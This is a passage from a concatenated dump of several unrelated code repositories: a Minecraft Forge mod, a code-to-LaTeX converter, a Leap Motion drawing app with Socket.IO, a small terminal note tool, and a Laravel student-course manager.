public void SetupPasses(Driver driver)
{
//driver.TranslationUnitPasses.AddPass(new ClearCommentsPass());
}
public void Preprocess(Driver driver, ASTContext ctx)
{
// Remove when CppSharp binaries are up-to-date.
//ctx.IgnoreClassWithName("VariantValue");
// Remove when comment bug is fixed.
//ctx.IgnoreClassWithName("HashBase");
}
public void Postprocess(Driver driver, ASTContext ctx)
{
}
static class Program
{
public static void Main(string[] args)
{
ConsoleDriver.Run(new UrhoBindingsGen());
}
}
}
class ClearCommentsPass : TranslationUnitPass
{
public override bool VisitDeclaration(Declaration decl)
{
//decl.Comment = null;
return false;
}
}
}
| ad824a7cbc50e35c18fb807ecdbfe87bbfe582a8 | [
"C#",
"Makefile"
] | 2 | Makefile | tritao/Urho3D | 05ed8f720d0f2e56e14829ff1f8371a7cc4818bb | 604babd94d9cb5c05f6020d1e1b027c22048299b |
refs/heads/master | <file_sep>package com.minecreatr.electricalengineering.common.tile;
import cofh.api.energy.EnergyStorage;
import cofh.api.energy.IEnergyProvider;
import cofh.api.energy.IEnergyReceiver;
import com.minecreatr.electricalengineering.ElectricalEngineering;
import com.minecreatr.electricalengineering.common.util.NBTUtil;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.inventory.IInventory;
import net.minecraft.inventory.ISidedInventory;
import net.minecraft.item.ItemStack;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.nbt.NBTTagList;
import net.minecraft.network.NetworkManager;
import net.minecraft.network.Packet;
import net.minecraft.network.play.server.S35PacketUpdateTileEntity;
import net.minecraft.server.gui.IUpdatePlayerListBox;
import net.minecraft.tileentity.TileEntity;
import net.minecraft.tileentity.TileEntityFurnace;
import net.minecraft.util.ChatComponentTranslation;
import net.minecraft.util.EnumFacing;
import net.minecraft.util.IChatComponent;
/**
* Base class for all of the electrical engineering tile entities
*
* @author minecreatr
*/
public abstract class ElectricalEngineeringTile extends TileEntity implements ISidedInventory, IEnergyProvider, IEnergyReceiver, IUpdatePlayerListBox{

    /** Backing item storage; length is fixed at construction time. */
    protected ItemStack[] inventory;
    /** Maximum stack size accepted per slot. */
    protected int stackLimit;
    private EnumFacing facing;
    /** RF energy buffer shared by every machine in the mod. */
    protected EnergyStorage energyStorage;

    public ElectricalEngineeringTile(int inventorySize, int energyCapacity, EnumFacing facing){
        this(inventorySize, 64, energyCapacity, facing);
    }

    public ElectricalEngineeringTile(int inventorySize, int stackLimit, int energyCapacity, EnumFacing facing){
        inventory = new ItemStack[inventorySize];
        this.stackLimit = stackLimit;
        energyStorage = new EnergyStorage(energyCapacity);
        this.facing = facing;
    }

    /** Subclass hook: persist machine-specific state into the tag. */
    public abstract void writeData(NBTTagCompound compound);

    /** Subclass hook: restore machine-specific state from the tag. */
    public abstract void readData(NBTTagCompound compound);

    @Override
    public void writeToNBT(NBTTagCompound compound)
    {
        super.writeToNBT(compound);
        NBTUtil.writeInventory("inventory", compound, inventory);
        energyStorage.writeToNBT(compound);
        NBTUtil.writeEnumFacing(facing, compound);
        this.writeData(compound);
    }

    @Override
    public void readFromNBT(NBTTagCompound compound)
    {
        super.readFromNBT(compound);
        inventory = NBTUtil.readInventory("inventory", compound);
        energyStorage.readFromNBT(compound);
        facing = NBTUtil.readEnumFacing(compound);
        this.readData(compound);
    }

    /**
     * Get the direction the tile is facing
     * @return The EnumFacing
     */
    public EnumFacing getEnumFacing(){
        return this.facing;
    }

    public int getSizeInventory(){
        return inventory.length;
    }

    public ItemStack getStackInSlot(int index){
        return inventory[index];
    }

    public ItemStack decrStackSize(int slot, int amt){
        ItemStack stack = getStackInSlot(slot);
        if (stack != null) {
            if (stack.stackSize <= amt) {
                // Taking everything: clear the slot, return the whole stack.
                setInventorySlotContents(slot, null);
            } else {
                // Bug fix: the original cleared the slot when the
                // *split-off* stack was empty (only possible for amt <= 0),
                // which discarded the remaining items.  The remainder can
                // never reach zero in this branch, so no clearing is needed.
                stack = stack.splitStack(amt);
            }
        }
        return stack;
    }

    public ItemStack getStackInSlotOnClosing(int index){
        return getStackInSlot(index);
    }

    public void setInventorySlotContents(int index, ItemStack stack){
        inventory[index] = stack;
    }

    public int getInventoryStackLimit(){
        return stackLimit;
    }

    public void markDirty(){
    }

    @Override
    public Packet getDescriptionPacket() {
        // Sync the full tile state to watching clients.
        NBTTagCompound tagCompound = new NBTTagCompound();
        writeToNBT(tagCompound);
        return new S35PacketUpdateTileEntity(pos, 1, tagCompound);
    }

    @Override
    public void onDataPacket(NetworkManager networkManager, S35PacketUpdateTileEntity packet) {
        readFromNBT(packet.getNbtCompound());
    }

    public boolean isUseableByPlayer(EntityPlayer player){
        return true;
    }

    public void openInventory(EntityPlayer player){
    }

    public void closeInventory(EntityPlayer player){
    }

    // Field 0 is stored power, field 1 is power capacity; ids >= 2 are
    // delegated to the subclass via getExtraField/setExtraField.
    public int getField(int id) {
        if (id==0){
            return energyStorage.getEnergyStored();
        }
        else if (id==1){
            return energyStorage.getMaxEnergyStored();
        }
        else {
            return getExtraField(id);
        }
    }

    /**
     * Gets the extra field with the id
     * @param id The Id
     * @return the value of the extra field
     */
    protected int getExtraField(int id){
        return 0;
    }

    public void setField(int id, int value) {
        if (id==0){
            energyStorage.setEnergyStored(value);
        }
        else if (id==1){
            energyStorage.setCapacity(value);
        }
        else {
            setExtraField(id, value);
        }
    }

    /**
     * Sets any extra field
     * @param id field id
     * @param value field value
     */
    protected void setExtraField(int id, int value){
    }

    public int getFieldCount() {
        // Bug fix: previously returned a constant 2, so subclass fields
        // (ids >= 2, e.g. the furnace's smelt progress) were never included
        // in container field syncing.
        return 2 + getExtraFieldsCount();
    }

    /**
     * How many extra fields besides power
     * @return How many extra fields
     */
    protected int getExtraFieldsCount(){
        return 0;
    }

    public void clear(){
        for (int i=0;i<inventory.length;i++){
            inventory[i] = null;
        }
    }

    public String getName(){
        return "electricalEngineeringTile";
    }

    public boolean hasCustomName(){
        return false;
    }

    public IChatComponent getDisplayName(){
        return new ChatComponentTranslation(getName());
    }

    public ItemStack[] getContents(){
        return inventory;
    }

    public boolean isItemValidForSlot(int index, ItemStack stack){
        return true;
    }

    public boolean canConnectEnergy(EnumFacing facing){
        return true;
    }

    public int[] getSlotsForFace(EnumFacing side){
        return new int[]{0};
    }

    public int receiveEnergy(EnumFacing facing, int maxReceive, boolean simulate){
        return energyStorage.receiveEnergy(maxReceive, simulate);
    }

    public int getEnergyStored(EnumFacing facing){
        return energyStorage.getEnergyStored();
    }

    public int getMaxEnergyStored(EnumFacing facing){
        return energyStorage.getMaxEnergyStored();
    }

    public int extractEnergy(EnumFacing facing, int maxExtract, boolean simulate){
        return energyStorage.extractEnergy(maxExtract, simulate);
    }
}
<file_sep># ElectricalEngineering
A mod about electricity and technology
for Minecraft 1.8.
Written by minecreatr.
<file_sep>package com.minecreatr.electricalengineering.common.init;
import com.minecreatr.electricalengineering.Reference;
import com.minecreatr.electricalengineering.common.block.BlockElectricalFurnace;
import com.minecreatr.electricalengineering.common.tile.TileElectricalFurnace;
import net.minecraftforge.fml.common.registry.GameRegistry;
/**
* Used for registering all the mods tileentities
*
* @author minecreatr
*/
public class ModTiles implements Reference{

    /** Registers every tile entity provided by this mod. */
    public static void preInit(){
        final String furnaceId = "electricalFurnace";
        GameRegistry.registerTileEntity(TileElectricalFurnace.class, furnaceId);
    }
}
<file_sep>package com.minecreatr.electricalengineering.common.tile;
import net.minecraft.item.ItemStack;
import net.minecraft.item.crafting.FurnaceRecipes;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.tileentity.TileEntityFurnace;
import net.minecraft.util.EnumFacing;
/**
* Tile entity for an electrical furnace
*
* @author minecreatr
*/
public class TileElectricalFurnace extends ElectricalEngineeringTile {

    /** Smelting progress; exposed to containers as field id 2. */
    private int smeltProgress;

    public TileElectricalFurnace(EnumFacing f){
        // Two slots (input/output), stack limit 64, 32000 energy capacity.
        super(2, 64, 32000, f);
        smeltProgress = 0;
    }

    public void writeData(NBTTagCompound compound){
        compound.setInteger("cookTime", smeltProgress);
    }

    public void readData(NBTTagCompound compound){
        smeltProgress = compound.getInteger("cookTime");
    }

    @Override
    protected int getExtraFieldsCount(){
        return 1;
    }

    @Override
    protected void setExtraField(int id, int value){
        if (id == 2){
            smeltProgress = value;
        }
    }

    @Override
    protected int getExtraField(int id){
        return id == 2 ? smeltProgress : 0;
    }

    @Override
    public boolean canInsertItem(int index, ItemStack itemStackIn, EnumFacing direction){
        // Automation may only feed the input slot, and only when empty.
        return index == 0 && getStackInSlot(index) == null;
    }

    @Override
    public boolean canExtractItem(int index, ItemStack stack, EnumFacing direction){
        // Automation may only drain a non-empty output slot.
        return index == 1 && getStackInSlot(index) != null;
    }

    @Override
    public boolean isItemValidForSlot(int index, ItemStack stack){
        // The output slot never accepts items; the input slot only takes
        // items that have a furnace smelting result.
        return index != 1 && FurnaceRecipes.instance().getSmeltingResult(stack) != null;
    }

    public int[] getSlotsForFace(EnumFacing side){
        // Input is reachable from above, output from every other side.
        return side == EnumFacing.UP ? new int[]{0} : new int[]{1};
    }

    public void update(){
    }

    @Override
    public String getName(){
        return "electricalFurnace.name";
    }
}
<file_sep>package com.minecreatr.electricalengineering;
import com.minecreatr.electricalengineering.common.CommonProxy;
import com.minecreatr.electricalengineering.common.init.ModBlocks;
import com.minecreatr.electricalengineering.common.init.ModTiles;
import net.minecraft.creativetab.CreativeTabs;
import net.minecraft.init.Items;
import net.minecraft.item.Item;
import net.minecraftforge.fml.common.Mod;
import net.minecraftforge.fml.common.SidedProxy;
import net.minecraftforge.fml.common.event.FMLPreInitializationEvent;
/**
* Main mod class
* This mode adds stuff that has to do with electricity and technology
*
* @author minecreatr
*/
@Mod(modid = Reference.MODID, name = Reference.MOD_NAME, version = Reference.VERSION)
public class ElectricalEngineering implements Reference{

    // Mod instance field, filled in externally via @Mod.Instance.
    @Mod.Instance(MODID)
    public static ElectricalEngineering instance;

    // Side-specific proxy selected from the CLIENT_PROXY/SERVER_PROXY
    // class names declared in Reference.
    @SidedProxy(clientSide = CLIENT_PROXY, serverSide = SERVER_PROXY)
    public static CommonProxy proxy;

    // Creative tab grouping the mod's content.
    // NOTE(review): the armor-stand icon looks like a placeholder.
    public static final CreativeTabs tab = new CreativeTabs("tabElectricalEngineering") {
        @Override
        public Item getTabIconItem() {
            return Items.armor_stand;
        }
    };

    // Pre-init: run the side proxy first, then register blocks and tiles.
    @Mod.EventHandler
    public void preInit(FMLPreInitializationEvent event){
        proxy.preInit(this);
        ModBlocks.preInit();
        ModTiles.preInit();
    }
}
<file_sep>package com.minecreatr.electricalengineering.client.gui;
import com.minecreatr.electricalengineering.common.inventory.ContainerElectricalFurnace;
import com.minecreatr.electricalengineering.common.tile.TileElectricalFurnace;
import net.minecraft.client.gui.inventory.GuiContainer;
import net.minecraft.client.renderer.GlStateManager;
import net.minecraft.entity.player.InventoryPlayer;
import net.minecraft.inventory.IInventory;
import net.minecraft.tileentity.TileEntityFurnace;
import net.minecraft.util.ResourceLocation;
/**
* Gui for the electrical furnace
*
* @author minecreatr
*/
public class GuiElectricalFurnace extends GuiContainer{
private static final ResourceLocation texture = new ResourceLocation("textures/gui/container/furnace.png");
private TileElectricalFurnace tile;
private InventoryPlayer playerInventory;
public GuiElectricalFurnace(InventoryPlayer player, TileElectricalFurnace inventory){
super(new ContainerElectricalFurnace(player, inventory));
this.tile = inventory;
this.playerInventory = player;
}
protected void drawGuiContainerForegroundLayer(int mouseX, int mouseY)
{
String s = this.tile.getDisplayName().getUnformattedText();
this.fontRendererObj.drawString(s, this.xSize / 2 - this.fontRendererObj.getStringWidth(s) / 2, 6, 4210752);
this.fontRendererObj.drawString(this.playerInventory.getDisplayName().getUnformattedText(), 8, this.ySize - 96 + 2, 4210752);
}
protected void drawGuiContainerBackgroundLayer(float partialTicks, int mouseX, int mouseY)
{
GlStateManager.color(1.0F, 1.0F, 1.0F, 1.0F);
this.mc.getTextureManager().bindTexture(texture);
int k = (this.width - this.xSize) / 2;
int l = (this.height - this.ySize) / 2;
this.drawTexturedModalRect(k, l, 0, 0, this.xSize, this.ySize);
int i1;
}
}
<file_sep>package com.minecreatr.electricalengineering.client;
import com.minecreatr.electricalengineering.ElectricalEngineering;
import com.minecreatr.electricalengineering.client.gui.GuiElectricalFurnace;
import com.minecreatr.electricalengineering.common.CommonProxy;
import com.minecreatr.electricalengineering.common.inventory.ContainerElectricalFurnace;
import com.minecreatr.electricalengineering.common.tile.ElectricalEngineeringTile;
import com.minecreatr.electricalengineering.common.tile.TileElectricalFurnace;
import net.minecraft.entity.player.EntityPlayer;
import net.minecraft.util.BlockPos;
import net.minecraft.world.World;
import net.minecraftforge.fml.common.network.IGuiHandler;
import net.minecraftforge.fml.common.network.NetworkRegistry;
/**
* Client side proxy and gui handler
*
* @author minecreatr
*/
public class ClientProxy extends CommonProxy implements IGuiHandler{
@Override
public void preInit(ElectricalEngineering mod){
NetworkRegistry.INSTANCE.registerGuiHandler(mod, this);
}
@Override
public Object getServerGuiElement(int ID, EntityPlayer player, World world, int x, int y, int z){
BlockPos pos = new BlockPos(x, y, z);
if (!(world.getTileEntity(pos) instanceof ElectricalEngineeringTile)){
return null;
}
switch (ID){
case 0: return new ContainerElectricalFurnace(player.inventory, (TileElectricalFurnace)world.getTileEntity(pos));
default: return null;
}
}
@Override
public Object getClientGuiElement(int ID, EntityPlayer player, World world, int x, int y, int z){
BlockPos pos = new BlockPos(x, y, z);
if (!(world.getTileEntity(pos) instanceof ElectricalEngineeringTile)){
return null;
}
switch (ID){
case 0: return new GuiElectricalFurnace(player.inventory, (TileElectricalFurnace)world.getTileEntity(pos));
default: return null;
}
}
}
| dbc332907bc5a64c0605efb9754f7bf6dc5b468c | [
"Markdown",
"Java"
] | 7 | Java | minecreatr/ElectricalEngineering | 41d390161e6772f6353676fd913af3da01ca1539 | 0afff70170a834e571bbeaad60e6f92825acf664 |
refs/heads/master | <file_sep>package sfw2020;
public class SFW2020testFramework {
public static void main(String[] args) {
}
}
| e222c7be634f55baa215ae946c963b8da1f34bec | [
"Java"
] | 1 | Java | mrtbd88/SFW2020 | c7b7e4e7e9484e8149c3c7f03328cb146e9600bd | 45d2c4dc36d402c8809f2d2576537b9f6a4639ed |
refs/heads/master | <repo_name>dungvtdev/helpy<file_sep>/README.md
# Helpy
Help-er tin-y aka tiny helper.
A simple set of tools which help you some simple task in linux enviroment.
<file_sep>/tinynote/tinynote.py
#! /usr/bin/python2
# tinynote.py - commandline simple note, file sys.
import sys,os
import printbeautify as printb
commands={}
maxNameLen=10
dataFolder=''
noteFile=''
"""
Cmd functions
"""
# wrap function for command function
def command(func):
commands[func.__name__]=func
return func
@command
def path(params):
printb.info("Current data folders: %s" % dataFolder)
@command
def listnotes(params):
path(params)
for filename in next(os.walk(dataFolder))[2]:
print(filename)
"""
Loop dispatch command
"""
def getCurrentName():
n = noteFile[:min(maxNameLen,len(noteFile))] + '# '
return n
def loopInput():
# loopContinue=True
while(True):
n=getCurrentName() # note# (input)
sinput=raw_input(n)
if not sinput:
printb.error('Need type command')
continue
if sinput.strip() == 'quit':
break;
dispatchCmd(sinput)
def dispatchCmd(sinput):
params=sinput.split()
if len(params)==0 or params[0] not in commands.keys():
printb.error('Command Not Found')
return False
method_name=params[0]
method=commands[method_name]
method(params[1:])
return True
if __name__=='__main__':
print(commands.keys())
if len(sys.argv) >= 2:
dataFolder=sys.argv[1]
loopInput()
printb.info('Note end')
<file_sep>/tinynote/printbeautify.py
#! /usr/bin/python2
# printbeautify.py - wrap color text, specify styles
from functools import wraps
CSI='\x1B['
reset = CSI+'0m'
Black,Red,Green,Yellow,Blue,Purple,Cyan,White = range(0,8)
NoEffect,Bold,Underline,Negative1,Negative2 = [0,1,2,3,5]
def colorText(colorInt):
c=colorInt+30
return str(c)
def colorBackgroud(colorInt):
c=colorInt+40
return str(c)
def colorString(textCol, bgCol):
return colorText(textCol)+';'+colorBackgroud(bgCol)+'m'
def raw_print(s):
print(s)
def color(colorval):
def color_decorator(func):
wraps(func)
def func_wrap(s):
func(CSI+colorval+s+reset)
return func_wrap
return color_decorator
error=color(colorString(Red,Black))(raw_print)
log=raw_print
info=color(colorString(Green,Black))(raw_print)
warning=color(colorString(Yellow,Black))(raw_print) | 40305f60d7636fb245f3aba994c9bf19ca4d0659 | [
"Markdown",
"Python"
] | 3 | Markdown | dungvtdev/helpy | c12a76fd55e310fcc32d88217580a58bc88c3510 | 1f6cc1d77849fc1385c3d35585d87d5b19df8ea1 |
refs/heads/master | <repo_name>gonsp/Motion-Drawing<file_sep>/leap/src/main.py
import sys
from socketIO_client import SocketIO, LoggingNamespace
sys.path.insert(0, "../lib")
import Leap
import select
from Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture
is_calibrated = False
corners = []
origin = None
dimension = None
is_hand_present = False
socket = SocketIO('localhost', 3000, LoggingNamespace)
class SampleListener(Leap.Listener):
def on_connect(self, controller):
print "Connected"
def on_frame(self, controller):
global is_hand_present
frame = controller.frame()
fingers = frame.fingers
if is_hand_present and fingers.is_empty:
is_hand_present = False
socket.emit('hand_detection', {'hand-detected': is_hand_present})
print "no hand"
elif not is_hand_present and not fingers.is_empty:
is_hand_present = True
socket.emit('hand_detection', {'hand-detected': is_hand_present})
print "HAND DETECTED"
if not fingers.is_empty:
index = fingers.finger_type(Leap.Finger.TYPE_INDEX)
index = Leap.Finger(index[0])
tip_pos = index.stabilized_tip_position
if not is_calibrated:
calibrate(tip_pos)
else:
if frame.id % 10 == 0:
pos = refresh(tip_pos)
print pos
socket.emit('leap-event', {'x': pos[0], 'y': pos[1]})
def calibrate(pos):
global corners
if select.select([sys.stdin, ], [], [], 0.0)[0]:
sys.stdin.readline()
corners.append(pos)
print "CALIBRATED CORNERS: %i, CORNER %i: X: %i Y: %i" % \
(len(corners), len(corners), corners[-1][1], -corners[-1][2])
socket.emit('calibrated-corners', {'num_corners': len(corners)})
if len(corners) == 4:
global is_calibrated
is_calibrated = True
global origin
origin_x = corners[0][1]
origin_y = -corners[0][2]
origin = [origin_x, origin_y]
print "ORIGIN X: %i, ORIGIN Y: %s" % (origin_x, origin_y)
global dimension
x_pos = corners[2][1] - origin_x
y_pos = -corners[2][2] - origin_y
dimension = [x_pos, y_pos]
# possible recalibration --> relocate dimension
# x1_pos = corners[1][1] - origin_x
# y1_pos = -corners[3][2] - origin_y
# if abs(x_pos - x1_pos) > 20 or abs(y_pos - y1_pos) > 20:
# corners = []
# is_calibrated = False
# print "RECALIBRATE"
# socket.emit('calibrated-corners', {'num_corners': len(corners)})
# else:
# dimension = [(x_pos + x1_pos) / 2.0, (y_pos + y1_pos) / 2.0]
# print "DIM X: %i, DIM Y: %s" % ((x_pos + x1_pos) / 2.0, (y_pos + y1_pos) / 2.0)
def refresh(tip_pos):
x = tip_pos[1]
y = -tip_pos[2]
x_pos = max(0, min((x - origin[0]) / dimension[0], 1))
y_pos = max(0, min((y - origin[1]) / dimension[1], 1))
return [round(x_pos, 2), round(y_pos, 2)]
def main():
# Create a sample listener and controller
listener = SampleListener()
controller = Leap.Controller()
controller.set_policy(Leap.Controller.POLICY_OPTIMIZE_HMD)
controller.set_policy(Leap.Controller.POLICY_BACKGROUND_FRAMES)
# Have the sample listener receive events from the controller
controller.add_listener(listener)
while True:
pass
if __name__ == "__main__":
main()
<file_sep>/server/public/javascripts/handscroll.js
var canScroll = true;
$(function() {
document.addEventListener('gest', function(gesture) {
if (gesture.left && curActiveCol >= 3) {
return;
} else if (gesture.right && curActiveCol <= 0) {
return;
} else if (gesture.down && curActiveRow <= 0) {
return;
} else if (gesture.up && curActiveRow >= 3) {
return;
}
$(boxes[curActiveRow][curActiveCol]).removeClass('a-box')
if (canScroll && gesture.left) {
$.fn.fullpage.moveSlideRight();
curActiveCol++;
} else if (canScroll && gesture.right) {
$.fn.fullpage.moveSlideLeft();
curActiveCol--;
} else if (canScroll && gesture.up) {
$.fn.fullpage.moveSectionDown();
curActiveRow++;
} else if (canScroll) {
$.fn.fullpage.moveSectionUp();
curActiveRow--;
}
$(boxes[curActiveRow][curActiveCol]).addClass('a-box')
}, false);
gest.start();
});
<file_sep>/touchpad/wrapper.py
#!/usr/bin/env python
import sys
import subprocess
# from socketIO_client import SocketIO, LoggingNamespace
# socket = SocketIO('localhost', 3000, LoggingNamespace)
def main():
process = subprocess.Popen(["./build/Release/FingerMgmt.app/Contents/MacOS/FingerMgmt"], stdout=subprocess.PIPE)
for line in iter(process.stdout.readline, ''):
sys.stdout.write(line)
print(line)
if __name__ == "__main__":
main()
<file_sep>/touchpad/Tests/LinuxMain.swift
import XCTest
@testable import touchpadTests
XCTMain([
testCase(touchpadTests.allTests),
])
<file_sep>/README.md
# IMOD
Interactive Motion Drawing
<file_sep>/server/public/javascripts/mapmove.js
var boxes = new Array(4);
var curActiveRow = 0;
var curActiveCol = 0;
for (var i = 0; i < boxes.length; i++) {
boxes[i] = new Array(4);
}
elements = document.getElementsByClassName('box');
for (var i = 0; i < elements.length; i++) {
boxes[Math.floor(i / 4)][i % 4] = elements[i];
}
<file_sep>/leap/src/comm.py
from socketIO_client import SocketIO, LoggingNamespace
with SocketIO('localhost', 3000, LoggingNamespace) as socketIO:
#socketIO.emit('calibrate',{'reading_status':is_reading})
#socketIO.emit('hand detection')
socketIO.emit('leap-event', {'x': 0.5, 'y': 0.1})
socketIO.wait(seconds=0.1)
<file_sep>/server/public/javascripts/draw.js
var socket = io();
var lastTimestamp;
socket.on('leap-event-client', function (data) {
if (Date.now() - lastTimestamp > 120) {
$('#pointerImg').show();
} else {
$('#pointerImg').hide();
}
var screenY = data.y * window.innerHeight;
var screenX = data.x * window.innerWidth;
$("#pointerImg").css({'top': screenY + 'px', 'left': screenX + 'px'});
});
socket.on('trackpad-event-client', function (data) {
var dataContext = parseInt(curActiveRow) + 1;
var curentRow = $("div[data-anchor=" + dataContext + "]");
var maybe = curentRow.find(".active");
var next = maybe.find("canvas");
var ctx = next[0].getContext("2d");
if (Date.now() - lastTimestamp > 120) {
ctx.closePath();
ctx.beginPath();
}
lastTimestamp = Date.now();
var screenY = data.y * window.innerHeight;
var screenX = data.x * window.innerWidth;
ctx.lineTo(screenX, screenY);
ctx.stroke();
});
$(document).ready(function () {
window.requestAnimFrame = function () {
return window.requestAnimationFrame ||
window.webkitRequestAnimationFrame ||
window.mozRequestAnimationFrame ||
window.oRequestAnimationFrame ||
window.msRequestAnimationFrame ||
function (callback) {
callback()
}
}();
$('#fullpage').fullpage({
//Navigation
menu: '#menu',
lockAnchors: false,
anchors: ['1', '2', '3', '4'],
navigation: false,
navigationPosition: 'right',
navigationTooltips: ['1', '2', '3', '4'],
showActiveTooltip: false,
slidesNavigation: false,
slidesNavPosition: 'bottom',
//Scrolling
css3: true,
scrollingSpeed: 1200,
autoScrolling: true,
fitToSection: true,
fitToSectionDelay: 1000,
scrollBar: false,
easing: 'easeInOutCubic',
easingcss3: 'ease',
loopBottom: false,
loopTop: false,
loopHorizontal: false,
continuousVertical: false,
continuousHorizontal: false,
scrollHorizontally: false,
interlockedSlides: false,
dragAndMove: false,
offsetSections: false,
resetSliders: false,
fadingEffect: false,
normalScrollElements: null,
scrollOverflow: false,
scrollOverflowReset: false,
scrollOverflowOptions: null,
touchSensitivity: 15,
normalScrollElementTouchThreshold: 5,
bigSectionsDestination: null,
//Accessibility
keyboardScrolling: false,
animateAnchor: false,
recordHistory: true,
//Design
controlArrows: false,
verticalCentered: true,
sectionsColor: ['#ccc', '#fff'],
paddingTop: '3em',
paddingBottom: '10px',
fixedElements: null,
responsiveWidth: 0,
responsiveHeight: 0,
responsiveSlides: false,
parallax: false,
parallaxOptions: {type: 'reveal', percentage: 62, property: 'translate'},
//Custom selectors
sectionSelector: '.section',
slideSelector: '.slide',
lazyLoading: true,
//events
onLeave: function (index, nextIndex, direction) {
var prevSlide = $('body').attr('class').split('-')[3];
if (prevSlide != '0') {
var leavingSection = $(this);
requestAnimFrame(function () {
$.fn.fullpage.moveTo(nextIndex, parseInt(prevSlide));
canScroll = false
return false;
});
}
},
afterLoad: function (anchorLink, index) {
canScroll = true;
},
afterRender: function () {
},
afterResize: function () {
},
afterResponsive: function (isResponsive) {
},
afterSlideLoad: function (anchorLink, index, slideAnchor, slideIndex) {
canScroll = true;
},
onSlideLeave: function (anchorLink, index, slideIndex, direction, nextSlideIndex) {
canScroll = false;
}
});
});
var canvasContexts = [];
// Drawing part
function update(jscolor) {
// 'jscolor' instance can be used as a string
for (var i = 0; i < canvasContexts.length; i++) {
canvasContexts[i].strokeStyle = '#' + jscolor
}
}
$('.c').each(function () {
var ctx = this.getContext('2d');
canvasContexts.push(ctx);
var classes = $(this).attr('class').split(' ');
this.width = window.innerWidth;
this.height = window.innerHeight;
ctx.beginPath();
ctx.lineWidth = 10;
ctx.lineJoin = ctx.lineCap = 'round';
if (classes.includes('can-lt-corner')) {
$(this).css("margin-left", "40px");
$(this).css("margin-top", "40px");
} else if (classes.includes('can-rt-corner')) {
this.width -= 70;
$(this).css("margin-top", "40px");
} else if (classes.includes('can-l')) {
$(this).css("margin-left", "40px");
} else if (classes.includes('can-r')) {
this.width -= 70;
} else if (classes.includes('can-t')) {
$(this).css("margin-top", "40px");
} else if (classes.includes('can-lb-corner')) {
$(this).css("margin-left", "40px");
this.height -= 60;
$(this).css("margin-bottom", "60px");
} else if (classes.includes('can-rb-corner')) {
this.width -= 70;
this.height -= 60;
$(this).css("margin-bottom", "60px");
} else if (classes.includes('can-b')) {
$(this).css("margin-bottom", "60px");
this.height -= 60;
}
});
| f2670c3028e7f7acbd49dfcc709d64dfe6802e2e | [
"JavaScript",
"Python",
"Markdown",
"Swift"
] | 8 | Python | gonsp/Motion-Drawing | 33e0871ab8d2270d26737faf39c85526e1b98519 | aa3b05e44b9e0d586885859c1525ec5c662591e5 |
refs/heads/master | <repo_name>TejasAvinashShetty/code2tex<file_sep>/hello_worlds/PHP.php
<?php
echo "Hello World!";
//";" at the end is optional
?>
<file_sep>/convert_all.py
#!/usr/bin/env python3
import re
import subprocess
import sys
from collections import defaultdict
from pathlib import Path
import code2tex
def main():
if len(sys.argv) != 2:
sys.exit('''Usage: %s [DIRECTORY]
Outputs .tex files and generate PDFs in CWD
Languages (for syntax highlighting) determined from file extensions.''' % (sys.argv[0],))
# Check existence of folder
directory = Path(sys.argv[1])
if not directory.is_dir():
sys.exit("Directory not found: %s" % directory)
matched = defaultdict(list)
not_matched = []
# Regexes for matching various LMS filenames
patterns = {}
patterns['Moodle'] = re.compile(r"([^/]+?_\d+)_assignsubmission_file_/(.+)$")
patterns['Canvas'] = re.compile(r"([^/]+?_\d+)_\d+_(.+)$")
# Gather all files in directory
files = directory.glob('**/*')
# Match filenames against any LMS patterns, storing those that match
for f in files:
if f.is_dir():
continue
for pattern in patterns.values():
match = re.search(pattern, str(f))
if match:
matchinfo = (str(f), match.group(2))
matched[match.group(1)].append(matchinfo)
break
else:
# triggered if end of for loop reached, break *not* used
not_matched.append(str(f))
# Output .tex and create PDFs for all matched files, grouped by name
for name in matched:
output_file_name = (name + "_files.tex").replace(" ", "_")
output_file = open(output_file_name, "w")
code2tex.makeTop(output_file)
for fullpath, filename in matched[name]:
code2tex.addListing(fullpath, filename, output_file)
code2tex.makeBottom(output_file)
output_file.close()
# Convert to PDF
print("[32m{}[m".format(output_file_name))
subprocess.call(["pdflatex", "-interaction=batchmode", output_file_name])
print()
print("CONVERTED FILES FOR NAMES")
for name in matched or ["---None---"]:
print(name)
print()
print("FILES NOT MATCHED")
for file in not_matched or ["---None---"]:
print(file)
if __name__ == "__main__":
main()
| 5db3ef819d3d6b47917fd2667a536507e0cf1b16 | [
"Python",
"PHP"
] | 2 | PHP | TejasAvinashShetty/code2tex | a21e40dd144ab0eeef7a5214be01e41389e308e7 | b456a137af4b42e3672ec7441068cfc72859f051 |
refs/heads/main | <file_sep><?php
namespace App\Http\Controllers;
use App\Models\Student;
use Illuminate\Http\Request;
class StudentController extends Controller
{
public function index(){
return view('student.index');
}
public function store(Request $request){
$data=$request->validate([
'name'=>[],
'identification'=>[]
]);
auth()->user()->student()->create($data);
return back();
}
public function edit(Student $student){
return view('student.edit',compact('student'));
}
public function update(Request $request,Student $student){
$data=$request->validate([
'name'=>[],
'identification'=>[]
]);
$student->update($data);
return redirect()->route('student.index');
}
public function destroy(Student $student){
$student->delete();
return back();
}
public function addStudentCourses(Student $student){
return view('courses.student',compact('student'));
}
//student course
public function studentcourse(Request $request,Student $student){
$data=$request->validate([
'course_id'=>[]
]);
$student->studentcourse()->syncWithoutDetaching($request->input('course_id',[]));
return back();
}
public function schedules(Student $student){
return view('student.schedules',compact('student'));
}
}
<file_sep>## Course Management
A syste to keep trach of students and courses
### Pre-requirisits
- You must have nodejs installed
- You must have XAMPP installed
- You must have composer installed
### Installation
Create a database for saving the data
```sh
cp .env.example .env
```
Change the database credentials to match yours
Run the following commands in the root directory of the project
```sh
composer install
php artisan key:generate
php artisan migrate
npm install && npm run dev
php artisan serve
```
Then open the browser and visit the url localhost:8000<file_sep><?php
namespace App\Providers;
use App\Models\Course;
use App\Models\Player;
use App\Models\Student;
use Illuminate\Support\Facades\View;
use Illuminate\Support\Facades\Schema;
use Illuminate\Support\ServiceProvider;
class AppServiceProvider extends ServiceProvider
{
/**
* Register any application services.
*
* @return void
*/
public function register()
{
//
}
/**
* Bootstrap any application services.
*
* @return void
*/
public function boot()
{
if(Schema::hasTable('students')){
View::share('students',Student::all());
}
if(Schema::hasTable('courses')){
View::share('courses',Course::all());
}
if(Schema::hasTable('players')){
View::share('players',Player::all());
}
}
}
<file_sep><?php
namespace App\Http\Controllers;
use App\Models\Course;
use Illuminate\Http\Request;
class CourseController extends Controller
{
public function index(){
